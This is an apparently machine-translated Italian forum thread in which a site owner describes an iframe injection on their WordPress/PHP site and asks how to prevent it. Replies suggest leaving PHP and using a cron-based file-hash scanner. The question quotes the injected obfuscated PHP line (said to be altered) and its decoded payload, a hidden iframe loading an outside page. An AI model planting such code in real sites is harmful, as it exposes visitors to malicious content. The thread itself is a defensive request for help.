Negli ultimi giorni, il mio sito Web è stato ripetutamente oggetto di un attacco iframe. Il codice è aggiunto principalmente alle pagine PHP e Javascript. Il codice è quindi base di PHP 64 codificato, vedi esempio (ho cambiato il codice un po 'per neutralizzarlo):Attacco iframe sito Web - inserisce il codice nella fonte
#c3284d#
echo(gzinflate(base64_decode("aJ1yhA3pkW4cWnUnmFluNmeq66wqE0OmVRcMUP3WQAupFZFGgaJvSE7IZH67z5S8 VwMxbWwg/TRkFvtPyCw9AGGzqRm8Qi/1LV6+9MdTtf9rtXb8e4L")));
#/c3284d#
Questo decodificato sembra qualcosa di simile:
<script type="text/javascript">
document.write(
'<iframe src="http://opticmoxie.com/xxxxxxx.php"
name="Twitter" scrolling="auto" frameborder="no"
align="center" height="2" width="2"></iframe>'
);
Il una cosa in comune è che tutto il codice ha il commento "# c3284d #" quindi rintracciare il codice malevolo non è difficile. Ma richiede molto tempo ...
Siamo su un server condiviso a Gradwell (Regno Unito) e non sono stati particolarmente utili. Quindi la domanda è: cosa posso fare per evitare che questo problema si ripeta da solo? Sono a conoscenza degli attacchi di MySQL Injection e utilizzo mysql_real_escape_string di PHP per prevenire tali attacchi.
Il sito è PHP e unità MySQL. Utilizziamo MySQLFTP e abbiamo un account shell per l'accesso SSH. Usiamo Wordpress (ultimo aggiornamento con i plugin disattivati).
Esiste un sacco di informazioni su PHP che esistono su questo tipo di domande e vi incoraggio a cercarlo, ma la risposta a questa domanda è una riflessione laterale "[uso qualcosa di diverso da PHP.] (http://me.veekun.com/blog/2012/04/09/php-a-fractal-of-bad-design/)" PHP è più incline a problemi di sicurezza di altre lingue –
Una vecchia domanda, ma vale comunque la pena di fare questo: ottenere uno scanner hash e installarlo nel proprio account. Ce ne sono parecchi in PHP, da quello che ho Posso dire. Questi usano cron per controllare quali file sono nuovi o sono cambiati e possono mandarti una email se vengono trovate modifiche sospette. – halfer